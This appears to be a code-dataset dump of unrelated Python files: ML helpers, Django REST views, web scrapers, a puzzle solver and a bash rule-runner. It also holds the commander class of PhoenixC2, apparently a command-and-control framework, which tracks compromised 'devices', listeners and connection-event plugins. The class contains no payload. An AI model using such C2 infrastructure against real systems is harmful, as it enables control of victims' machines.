"views.ArticleList", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.ArticleDetail.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.ArticleDetail", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ArticlePre.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ArticlePre", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "views.CategoryList.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "views.CategoryList", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "views.CategoryList.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "views.CategoryList", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.AuthorList.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "views.AuthorList", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.AuthorList.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.AuthorList", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "22974304059", "text": "# Helper Class for Initilizing GridSearch\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\n\r\n# name of the columns of the data frame which captures all the data of all algorithms\r\nMLA_Name = 'MLA Name'\r\nMLA_Param = 'MLA Parameters'\r\nMLA_Train_Accuracy = 'MLA Train Accuracy'\r\nMLA_Validation_Accuracy = 'MLA Validation Accuracy'\r\nMLA_Validation_STD = 'MLA Validation Accuracy 3*STD'\r\nMLA_Test_Accuracy = 'MLA Test Accuracy'\r\nMLA_Time = 'MLA Time'\r\n\r\nclass EstimatorSelectionHelper:\r\n \"\"\"Class to train and evaluate and score differnt ML models.\r\n It also retuns important features , best parameters after ML model evaluation\r\n It also dumps to model to local file system so that it can be used for later use\r\n \"\"\"\r\n\r\n def __init__(self):\r\n\r\n self.models = {}\r\n self.params = {}\r\n self.grid_searches = {}\r\n self.best_params = {}\r\n self.feature_importance = {}\r\n self.FeatureImportanceAlgo = ['DecisionTreeClassifier','RandomForestClassifier','ExtraTreesClassifier','GradientBoostingClassifier']\r\n self.MLA = pd.DataFrame(columns = [MLA_Name, MLA_Param, MLA_Time, MLA_Train_Accuracy, MLA_Validation_Accuracy, MLA_Test_Accuracy])\r\n\r\n\r\n def score(self, X_test, Y_test):\r\n \"\"\"function scores all added ML models \"\"\"\r\n df = self.MLA\r\n for k in self.grid_searches:\r\n print(k)\r\n algo = self.grid_searches[k]\r\n df.loc[ df[MLA_Name]== k , MLA_Test_Accuracy] = algo.score(X_test, Y_test)\r\n return self.MLA\r\n\r\n def fit(self, X, y, cv=3, n_jobs=3, verbose=1, scoring=None, refit=True):\r\n \"\"\"function fits all added ML models \"\"\"\r\n if not set(self.models.keys()).issubset(set(self.params.keys())):\r\n missing_params = list(set(self.models.keys()) - set(self.params.keys()))\r\n raise ValueError(\"Some estimators are missing parameters: %s\" % missing_params)\r\n\r\n for key in self.models.keys():\r\n print(\"Running GridSearchCV for %s.\" % key)\r\n model = self.models[key]\r\n params = self.params[key]\r\n gs = GridSearchCV(model, params, cv=cv, n_jobs=n_jobs,\r\n verbose=verbose, scoring=scoring, refit=refit,\r\n return_train_score=True)\r\n gs.fit(X,y)\r\n self.grid_searches[key] = gs\r\n self.best_params[key] = str(gs.best_params_)\r\n if key in self.FeatureImportanceAlgo:\r\n self.feature_importance[key]= gs.best_estimator_ .feature_importances_\r\n\r\n\r\n # print (gs.best_params_.feature_importances_ )\r\n # try:\r\n # print(gs.best_params_.feature_importances_ )\r\n # self.feature_importance[key]= gs.best_params_.feature_importances_\r\n # except AttributeError:\r\n # pass\r\n\r\n def imp_features(self):\r\n \"\"\"function returns the important feature evaluated after different ML evaluation\"\"\"\r\n\r\n d = self.feature_importance\r\n impDF = pd.DataFrame([d.keys(), d.values()])\r\n return impDF\r\n\r\n def returnBestParamDF(self):\r\n \"\"\"function returns the best paramemtes evaluated after different ML evaluation\"\"\"\r\n d = self.best_params\r\n BestParamDF = pd.DataFrame.from_dict([d.keys(), d.values()]).T\r\n return BestParamDF\r\n\r\n def add_model_and_params(self, name, model, hyperparam):\r\n \"\"\"function adds ML model and its Parameter to the class for evaluation \"\"\"\r\n self.models[name] = model\r\n self.params[name] = hyperparam\r\n\r\n def fit_summary(self):\r\n \"\"\"function accumulates the scores of each ML model into a member Data Frame\"\"\"\r\n arr = []\r\n for k in self.grid_searches:\r\n dict= {}\r\n # print(k)\r\n algo = self.grid_searches[k]\r\n dict[MLA_Name] = k\r\n dict[MLA_Param] = str(algo.best_params_)\r\n dict[MLA_Time] = np.nanmean( algo.cv_results_['mean_fit_time'])\r\n dict[MLA_Train_Accuracy] = np.nanmean(algo.cv_results_['mean_train_score'])\r\n dict[MLA_Validation_Accuracy] = np.nanmean(algo.cv_results_['mean_test_score'], )\r\n dict[MLA_Test_Accuracy] = 0\r\n arr.append(dict)\r\n\r\n self.MLA = pd.DataFrame(arr)\r\n return self.MLA\r\n\r\n def save_model_to_file(self, modelname, filename='model.mdl'):\r\n \"\"\" function saves the input ML model is saved as input file \"\"\"\r\n if modelname not in self.grid_searches.keys():\r\n print(\"Model doesn't not exist !! No file is saved\")\r\n return False\r\n with open(filename, \"wb\") as file:\r\n pickle.dump(self.grid_searches[modelname],file)\r\n print(\"Model {} saved into file {}\".format(modelname, filename))\r\n return True\r\n", "repo_name": "irfanc/TelcomProject", "sub_path": "src/Estimator.py", "file_name": "Estimator.py", "file_ext": "py", "file_size_in_byte": 4812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "14149767216", "text": "from rest_framework import status\nfrom rest_framework.generics import CreateAPIView, RetrieveAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny\nfrom rest.app.user.serializers import UserRegistrationSerializer\nfrom rest.app.user.serializers import UserLoginSerializer\nimport datetime as dt\nimport pytz\n\n\nclass UserRegistrationView(CreateAPIView):\n\n serializer_class = UserRegistrationSerializer\n permission_classes = (AllowAny,)\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n event_date = dt.datetime.now().replace(tzinfo=pytz.UTC)\n local_date = event_date.astimezone(pytz.timezone('Asia/Jakarta'))\n response = {\n 'success' : 'True',\n 'status code' : status.HTTP_200_OK,\n 'message': 'User registered successfully',\n 'result': serializer.data,\n 'created_at': local_date.strftime('%m/%d/%Y %H:%M:%S %Z')\n }\n status_code = status.HTTP_200_OK\n return Response(response, status=status_code)\n\n\nclass UserLoginView(RetrieveAPIView):\n\n permission_classes = (AllowAny,)\n serializer_class = UserLoginSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n response = {\n 'success' : 'True',\n 'status code' : status.HTTP_200_OK,\n 'message': 'User logged in successfully',\n 'token' : serializer.data['token'],\n }\n status_code = status.HTTP_200_OK\n\n return Response(response, status=status_code)\n", "repo_name": "brianestadimas/django-sigmatech", "sub_path": "rest/app/user/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1736, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.generics.CreateAPIView", "line_number": 11, "usage_type": "name"}, {"api_name": "rest.app.user.serializers.UserRegistrationSerializer", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 14, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytz.UTC", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 21, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 24, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 24, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 29, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.generics.RetrieveAPIView", "line_number": 33, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 35, "usage_type": "name"}, {"api_name": "rest.app.user.serializers.UserLoginSerializer", "line_number": 36, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 43, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 43, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 47, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 47, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "18537746325", "text": "# 톱니바퀴 G5\nimport sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\n\ndef right(idx, d):\n # 더이상 오른쪽 이동 불가\n if idx > 4 or gear[idx - 1][2] == gear[idx][6]:\n return\n\n if gear[idx - 1][2] != gear[idx][6]: # 인접 톱니바퀴가 회전 가능하면\n right(idx + 1, -d) # 오른쪽 이동\n gear[idx].rotate(d) # 현재 톱니바퀴 회전\n\n\ndef left(idx, d):\n # 더이상 왼쪽 이동 불가\n if idx < 1 or gear[idx][2] == gear[idx + 1][6]:\n return\n\n if gear[idx][2] != gear[idx + 1][6]: # 인접 톱니바퀴가 회전 가능하면\n left(idx - 1, -d) # 왼쪽 이동\n gear[idx].rotate(d) # 현재 톱니바퀴 회전\n\n\ngear = {}\nfor i in range(1, 5):\n gear[i] = deque((map(int, input().strip()))) # rotate 함수를 이용하기 위해 deque 사용\n\nfor _ in range(int(input())):\n num, dir = map(int, input().split())\n\n right(num + 1, -dir)\n left(num - 1, -dir)\n gear[num].rotate(dir) # rotate()함수를 이용 (양수) -> 오른쪽 회전\n\nans = 0\nfor i in range(4):\n ans += gear[i + 1][0] * (2 ** i)\n\nprint(ans)\n", "repo_name": "kkm0406/AlgorithmBOJ", "sub_path": "구현/14891.py", "file_name": "14891.py", "file_ext": "py", "file_size_in_byte": 1139, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.stdin", "line_number": 5, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "34617366589", "text": "# Import dependencies\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup\nimport pandas as pd \nimport datetime as dt\nfrom datetime import datetime\n\n# Set the executable path and initialize the chrome browser in splinter\nexecutable_path = {'executable_path': '/usr/local/bin/chromedriver'}\nbrowser = Browser('chrome', **executable_path)\n\n# Visit URL\nurl = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\nbrowser.visit(url)\n\n#Get Cerberus Hemisphere image\n# Visit cerberus hemisphere site\nurl = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/cerberus_enhanced'\nbrowser.visit(url)\n\n#delay for loading the page\nbrowser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n# Parse the resulting html with soup\nhtml = browser.html\nimg_soup = BeautifulSoup(html, 'html.parser')\n\n# Find and click the full image button\nfull_image_elem = browser.find_by_id('wide-image-toggle')\nfull_image_elem.click()\n\n# Find and save Cerberus Hemisphere image url\nimg_url_cerberus = img_soup.select_one('img.wide-image').get(\"src\")\nimg_url_cerberus\n\n# Find and save hemisphere title \ncerberus_title = img_soup.find(\"h2\", class_='title').get_text()\ncerberus_title\n\n#Get Schiaparelli Hemisphere image\n# Visit Schiaparelli Hemisphere site\nurl = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/schiaparelli_enhanced'\nbrowser.visit(url)\n\n#delay for loading the page\nbrowser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n# Parse the resulting html with soup\nhtml = browser.html\nimg_soup = BeautifulSoup(html, 'html.parser')\n\n# Find and click the full image button\nfull_image_elem = browser.find_by_id('wide-image-toggle')\nfull_image_elem.click()\n\n# Find and save Schiaparelli Hemisphere image url\nimg_url_schiaparelli = img_soup.select_one('img.wide-image').get(\"src\")\nimg_url_schiaparelli\n\n# Find and save hemisphere title \nschiaparelli_title = img_soup.find(\"h2\", class_='title').get_text()\nschiaparelli_title\n\n#Get Syrtis Major Hemisphere image\n# Visit Syrtis Major Hemisphere site\nurl = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/syrtis_major_enhanced'\nbrowser.visit(url)\n\n#delay for loading the page\nbrowser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n# Parse the resulting html with soup\nhtml = browser.html\nimg_soup = BeautifulSoup(html, 'html.parser')\n\n# Find and click the full image button\nfull_image_elem = browser.find_by_id('wide-image-toggle')\nfull_image_elem.click()\n\n# Find and save Syrtis Major image url\nimg_url_syrtismajor = img_soup.select_one('img.wide-image').get(\"src\")\nimg_url_syrtismajor\n\n# Find and save hemisphere title \nsyrtismajor_title = img_soup.find(\"h2\", class_='title').get_text()\nsyrtismajor_title\n\n#Get Valles Marineris Hemisphere image\n# Visit Valles Marineris Hemisphere site\nurl = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/valles_marineris_enhanced'\nbrowser.visit(url)\n\n#delay for loading the page\nbrowser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n# Parse the resulting html with soup\nhtml = browser.html\nimg_soup = BeautifulSoup(html, 'html.parser')\n\n# Find and click the full image button\nfull_image_elem = browser.find_by_id('wide-image-toggle')\nfull_image_elem.click()\n\n# Find and save Valles Marineris image url\nimg_url_vallesmarineris = img_soup.select_one('img.wide-image').get(\"src\")\nimg_url_vallesmarineris\n\n# Find and save hemisphere title \nvallesmarineris_title = img_soup.find(\"h2\", class_='title').get_text()\nvallesmarineris_title", "repo_name": "HunterWelsch/Web-Scrapping-HTML-CSS", "sub_path": "Mars_Hemispheres.py", "file_name": "Mars_Hemispheres.py", "file_ext": "py", "file_size_in_byte": 3509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "splinter.Browser", "line_number": 10, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 26, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 50, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 74, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "12066060849", "text": "\"\"\"This is the C2 commander class which handles the devices & listeners\"\"\"\nfrom multiprocessing import Process\nfrom threading import Thread\nfrom typing import Optional, TYPE_CHECKING\nfrom flask import Flask\nfrom phoenixc2.server.kits.handler_base import BaseHandler\nfrom phoenixc2.server.kits.listener_base import BaseListener\nfrom phoenixc2.server.plugins.base import (\n BasePlugin,\n BlueprintPlugin,\n ExecutedPlugin,\n RoutePlugin,\n InjectedPlugin,\n PolyPlugin,\n ConnectionEventPlugin,\n)\nfrom phoenixc2.server.utils.web import FlaskThread\nfrom phoenixc2.server.utils.misc import Status\nfrom phoenixc2.server.utils.ui import log_connection, log\n\nif TYPE_CHECKING:\n from phoenixc2.server.database import DeviceModel\nINVALID_ID = \"Invalid ID\"\nHANDLER_DOES_NOT_EXIST = \"Handler doesn't exist\"\nLISTENER_DOES_NOT_EXIST = \"Listener doesn't exist\"\n\n\nclass Commander:\n \"\"\"This is the Commander is used as a registry for all devices and listeners\"\"\"\n\n def __init__(self):\n self.web_thread: FlaskThread\n self.web_server: Flask\n self.active_listeners: dict[int, BaseListener] = {}\n self.active_handlers: dict[int, BaseHandler] = {}\n self.active_plugins: dict[str, BasePlugin] = {}\n self.injection_plugins: dict[InjectedPlugin, str] = {} # plugin : output\n self.connection_event_plugins: list[tuple[ConnectionEventPlugin, dict]] = []\n\n def get_active_handler(self, handler_id: int) -> Optional[BaseHandler]:\n \"\"\"Get a handler by id\"\"\"\n try:\n return self.active_handlers[int(handler_id)]\n except ValueError as e:\n raise ValueError(INVALID_ID) from e\n except KeyError as e:\n raise KeyError(HANDLER_DOES_NOT_EXIST) from e\n\n def get_active_listener(self, listener_id: int) -> Optional[BaseListener]:\n \"\"\"Get a listener by id\"\"\"\n try:\n return self.active_listeners[int(listener_id)]\n except ValueError as e:\n raise ValueError(INVALID_ID) from e\n except KeyError:\n raise KeyError(LISTENER_DOES_NOT_EXIST) from None\n\n def add_active_listener(self, listener: BaseListener):\n \"\"\"Add a listener to the commander\"\"\"\n self.active_listeners[int(listener.id)] = listener\n\n def add_active_handler(self, handler: BaseHandler):\n \"\"\"Add a handler to the commander\"\"\"\n self.active_handlers[int(handler.id)] = handler\n\n def remove_active_listener(self, listener_id: int):\n \"\"\"Remove a listener from the commander\"\"\"\n try:\n self.active_listeners.pop(int(listener_id))\n except ValueError as e:\n raise ValueError(INVALID_ID) from e\n except KeyError as e:\n raise KeyError(LISTENER_DOES_NOT_EXIST) from e\n\n def remove_active_handler(self, handler_id: int):\n \"\"\"Remove a device from the commander by id\"\"\"\n try:\n self.active_handlers.pop(int(handler_id))\n except ValueError as e:\n raise ValueError(INVALID_ID) from e\n except KeyError as e:\n raise KeyError(HANDLER_DOES_NOT_EXIST) from e\n\n def load_plugin(self, plugin: BasePlugin, config: dict):\n \"\"\"Load a plugin\"\"\"\n if not plugin.check_dependencies():\n if (\n input(\n f\"Plugin {plugin.name} has missing dependencies.\"\n \"Would you like to install them? (y/n): \"\n ).lower()\n == \"y\"\n ):\n plugin.install_dependencies()\n else:\n raise ModuleNotFoundError(\n f\"Plugin {plugin.name} has missing dependencies\"\n )\n if plugin.name in self.active_plugins:\n raise KeyError(f\"Plugin {plugin.name} already loaded\")\n\n if issubclass(plugin, ExecutedPlugin):\n try:\n if plugin.execution_type == \"direct\":\n plugin.execute(self, config)\n elif plugin.execution_type == \"thread\":\n Thread(\n target=plugin.execute, args=(self, config), name=plugin.name\n ).start()\n elif plugin.execution_type == \"process\":\n Process(\n target=plugin.execute, args=(self, config), name=plugin.name\n ).start()\n else:\n raise ValueError(f\"Invalid execution type {plugin.execution_type}\")\n except Exception as e:\n raise Exception(f\"Failed to load plugin '{plugin.name}'\") from e\n\n elif issubclass(plugin, BlueprintPlugin):\n self.web_server.register_blueprint(plugin.execute(self, config))\n\n elif issubclass(plugin, RoutePlugin):\n self.web_server.add_url_rule(plugin.rule, plugin.name, plugin.execute)\n\n elif issubclass(plugin, InjectedPlugin):\n self.injection_plugins[plugin] = plugin.execute(self, config)\n\n elif issubclass(plugin, ConnectionEventPlugin):\n self.connection_event_plugins.append((plugin, config))\n\n elif issubclass(plugin, PolyPlugin):\n # Loads all plugins which are specified by the poly-plugin\n for sub_plugin in plugin.plugins:\n self.load_plugin(sub_plugin, config)\n\n else:\n plugin.execute(self, config)\n\n self.active_plugins[plugin.name] = plugin\n\n def new_connection(self, device: \"DeviceModel\", reconnect: bool = False):\n \"\"\"Called when a new device connects\"\"\"\n log_connection(device, reconnect)\n\n for plugin, config in self.connection_event_plugins:\n try:\n plugin.execute(device, config)\n except Exception as e:\n log(\n f\"Failed to execute connection event plugin {plugin.name}: {e}\",\n Status.Danger,\n )\n", "repo_name": "PhoenixC2/PhoenixC2", "sub_path": "phoenixc2/server/commander/commander.py", "file_name": "commander.py", "file_ext": "py", "file_size_in_byte": 5909, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 266, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 21, "usage_type": "name"}, {"api_name": "phoenixc2.server.utils.web.FlaskThread", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 33, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.listener_base.BaseListener", "line_number": 34, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.handler_base.BaseHandler", "line_number": 35, "usage_type": "name"}, {"api_name": "phoenixc2.server.plugins.base.BasePlugin", "line_number": 36, "usage_type": "name"}, {"api_name": "phoenixc2.server.plugins.base.InjectedPlugin", "line_number": 37, "usage_type": "name"}, {"api_name": "phoenixc2.server.plugins.base.ConnectionEventPlugin", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 40, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.handler_base.BaseHandler", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.listener_base.BaseListener", "line_number": 49, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.listener_base.BaseListener", "line_number": 58, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.handler_base.BaseHandler", "line_number": 62, "usage_type": "name"}, {"api_name": "phoenixc2.server.plugins.base.BasePlugin", "line_number": 84, "usage_type": "name"}, {"api_name": "phoenixc2.server.plugins.base.ExecutedPlugin", "line_number": 102, "usage_type": "argument"}, {"api_name": "threading.Thread", "line_number": 107, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 111, "usage_type": "call"}, {"api_name": "phoenixc2.server.plugins.base.BlueprintPlugin", "line_number": 119, "usage_type": "argument"}, {"api_name": "phoenixc2.server.plugins.base.RoutePlugin", "line_number": 122, "usage_type": "argument"}, {"api_name": "phoenixc2.server.plugins.base.InjectedPlugin", "line_number": 125, "usage_type": "argument"}, {"api_name": "phoenixc2.server.plugins.base.ConnectionEventPlugin", "line_number": 128, "usage_type": "argument"}, {"api_name": "phoenixc2.server.plugins.base.PolyPlugin", "line_number": 131, "usage_type": "argument"}, {"api_name": "phoenixc2.server.utils.ui.log_connection", "line_number": 143, "usage_type": "call"}, {"api_name": "phoenixc2.server.utils.ui.log", "line_number": 149, "usage_type": "call"}, {"api_name": "phoenixc2.server.utils.misc.Status.Danger", "line_number": 151, "usage_type": "attribute"}, {"api_name": "phoenixc2.server.utils.misc.Status", "line_number": 151, "usage_type": "name"}]} +{"seq_id": "33758807177", "text": "import os\nimport tarfile\nimport urllib.request\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\n\ndef fetch_housing_data(housing_url, housing_path):\n try:\n os.makedirs(housing_path, exist_ok=True)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n return \"data fetched\"\n except Exception as e:\n return e\n\n\ndef split_housing_data(housing, housing_path):\n housing[\"income_cat\"] = pd.cut(housing[\"median_income\"], bins=[0.0, 1.5, 3.0, 4.5, 6.0, np.inf], labels=[1, 2, 3, 4, 5],)\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\n for train_index, test_index in split.split(housing, housing[\"income_cat\"]):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]\n\n strat_train_set.to_csv(os.path.join(housing_path, \"train.csv\"))\n strat_test_set.to_csv(os.path.join(housing_path, \"validation.csv\"))\n\n return (strat_train_set, strat_test_set)\n\n\ndef load_housing_data(housing_path):\n try:\n csv_path = os.path.join(housing_path)\n return pd.read_csv(csv_path)\n except Exception as e:\n return e\n", "repo_name": "RevanthAdiga/MLE-Training", "sub_path": "src/utils/fetch_load_data.py", "file_name": "fetch_load_data.py", "file_ext": "py", "file_size_in_byte": 1369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.makedirs", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 14, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 14, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.StratifiedShuffleSplit", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "23377368193", "text": "\"\"\"\nshinyrates_scraper.py\n\nScraper to collect data from shinyrates.com.\n\"\"\"\n\nimport copy\nimport json\nimport time\nimport requests\n\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import Any, Dict\nfrom loguru import logger\n\n\ndef write_to_file(data: Dict[Any, Any], last_updated: int) -> None:\n \"\"\"Write response data to an output file.\"\"\"\n\n outdir = Path(\"data\")\n if not outdir.exists():\n outdir.mkdir()\n\n with open(outdir.joinpath(f\"{last_updated}.json\"), \"w\") as f:\n json.dump(data, f, indent=4)\n logger.info(f\"Wrote data for {last_updated}\")\n\n\ndef stream_data():\n \"\"\"\n Gather data from shinyrates.com whenever it updates\n\n The website claims to update every minute, but that's clearly not the case based on\n observations; it had the same data from at least 9 AM - 9 PM. Sleep for 5\n minutes and then query every 5 minutes to see if we ever get different data.\n \"\"\"\n\n last_data = None\n while True:\n data = requests.get(\"https://shinyrates.com/data/rate\").json()\n\n if data == last_data:\n logger.debug(\"Still nothing\")\n time.sleep(300)\n continue\n\n write_to_file(data, datetime.now().strftime(\"%Y%m%d_%H%M%S\"))\n last_data = copy.deepcopy(data)\n logger.debug(\"Sleeping\")\n time.sleep(300)\n\n\nif __name__ == \"__main__\":\n stream_data()\n", "repo_name": "tuchandra/silph", "sub_path": "shinyrates_scraper.py", "file_name": "shinyrates_scraper.py", "file_ext": "py", "file_size_in_byte": 1382, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Dict", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 18, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 21, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 26, "usage_type": "call"}, {"api_name": "loguru.logger.info", "line_number": 27, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 27, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "loguru.logger.debug", "line_number": 44, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 44, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 49, "usage_type": "call"}, {"api_name": "loguru.logger.debug", "line_number": 50, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 50, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "27308020484", "text": "#!/usr/bin/env python\n#coding=utf-8\n\nimport subprocess\nimport argparse\nimport tempfile\nimport sys\nimport re\n\nclass NotARule(Exception):\n pass\n\ndef parse_rule(line):\n regexpr = '#\\s+(.+)\\s+->\\s*(.+)'\n m = re.match(regexpr, line)\n if m:\n inputs, outputs = m.groups()\n inputs = re.findall('[^ ,]+', inputs)\n outputs = re.findall('[^ ,]+', outputs)\n return inputs, outputs\n else:\n raise NotARule('not a rule')\n\ndef make_if_statement(inputs, outputs):\n conditions = []\n filedefs = 'INPUTFILES=`echo {}`\\n'.format(\" \".join(inputs))\n filedefs += 'OUTPUTFILES=`echo {}`\\n'.format(\" \".join(outputs))\n inputs_exist = 'for file in $INPUTFILES; do [ ! -e \"$file\" ] && echo \"Input file $file does not exist\" >&2 && exit 1; done\\n'\n\n conditions = \"\"\"\n runblock=0\n for inp in $INPUTFILES\n do\n for out in $OUTPUTFILES\n do\n if [ \"$inp\" -nt \"$out\" ]\n then\n runblock=1\n fi\n done\n done\n \"\"\"\n if_stmt = 'if [ \"$runblock\" -eq 1 ]\\nthen\\n'\n\n return filedefs + inputs_exist + conditions + if_stmt\n\n\ndef run_shell():\n parser = argparse.ArgumentParser()\n parser.add_argument('script')\n args = parser.parse_args()\n\n generated_scripts = tempfile.NamedTemporaryFile(mode='w',\n delete=False)\n\n print(generated_scripts.name)\n open_statement = False\n with file(args.script) as fid:\n for line in fid:\n if line.startswith(\"#\"):\n try:\n inputs, outputs = parse_rule(line)\n if open_statement:\n generated_scripts.write('fi\\n')\n open_statement = False\n outp_line = make_if_statement(inputs, outputs)\n open_statement = True\n outp_line += 'echo \"Running rule: {}\"\\n'.format(line[1:])\n except NotARule:\n outp_line = line\n else:\n outp_line = line\n generated_scripts.write(outp_line) \n\n if open_statement:\n generated_scripts.write('fi\\n')\n open_statement = False\n generated_scripts.flush()\n\n subprocess.call(['/bin/bash', generated_scripts.name])\n\n 